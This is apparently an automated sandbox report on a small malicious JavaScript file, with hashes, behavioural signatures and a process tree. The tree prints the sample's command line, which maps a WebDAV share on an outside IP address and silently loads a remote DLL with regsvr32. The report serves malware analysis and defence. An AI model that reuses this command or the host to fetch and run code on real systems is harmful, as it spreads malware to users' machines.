Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
- max time kernel: 149s
- max time network: 154s
- platform: windows10-2004_x64
- resource: win10v2004-20240709-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 23/07/2024, 02:03
Static task
- static1

Behavioral task
- behavioral1
  - Sample: 4ca5ffa9a6a1cf527e027693d7b7b9c9f0aadde0db80665ceb42f395a800fabb.js
  - Resource: win7-20240704-en

Behavioral task
- behavioral2
  - Sample: 4ca5ffa9a6a1cf527e027693d7b7b9c9f0aadde0db80665ceb42f395a800fabb.js
  - Resource: win10v2004-20240709-en
General
- Target: 4ca5ffa9a6a1cf527e027693d7b7b9c9f0aadde0db80665ceb42f395a800fabb.js
- Size: 3KB
- MD5: ddd8c6180a09e4f9337efa434ccbcbcd
- SHA1: ebd0961e8b94ad71160c600e0ae663d015b01574
- SHA256: 4ca5ffa9a6a1cf527e027693d7b7b9c9f0aadde0db80665ceb42f395a800fabb
- SHA512: f03857fa0d1e0f1c5a4f160bfc1a23023994a453eeb2b2d1ab7eb1951c210ab7b0e1bc2ed3531c8a4d560911869a8e03aa4debdef0302c0513e8df57e0ad517f
Malware Config
Signatures
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence.
  - description: Key value queried
    ioc: \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation
    Process: wscript.exe
- Command and Scripting Interpreter: JavaScript (1 TTP)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Runs net.exe
- Suspicious use of WriteProcessMemory (4 IoCs)
  - description: PID 212 wrote to memory of 3604
    pid: 212
    Process: wscript.exe
    procid_target: 84
  - description: PID 212 wrote to memory of 3604
    pid: 212
    Process: wscript.exe
    procid_target: 84
  - description: PID 3604 wrote to memory of 1048
    pid: 3604
    Process: cmd.exe
    procid_target: 86
  - description: PID 3604 wrote to memory of 1048
    pid: 3604
    Process: cmd.exe
    procid_target: 86
Processes
- C:\Windows\system32\wscript.exe (PID: 212)
  command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\4ca5ffa9a6a1cf527e027693d7b7b9c9f0aadde0db80665ceb42f395a800fabb.js
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe (PID: 3604)
    command line: "C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\92451529317231.dll
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net.exe (PID: 1048)
      command line: net use \\45.9.74.36@8888\davwwwroot\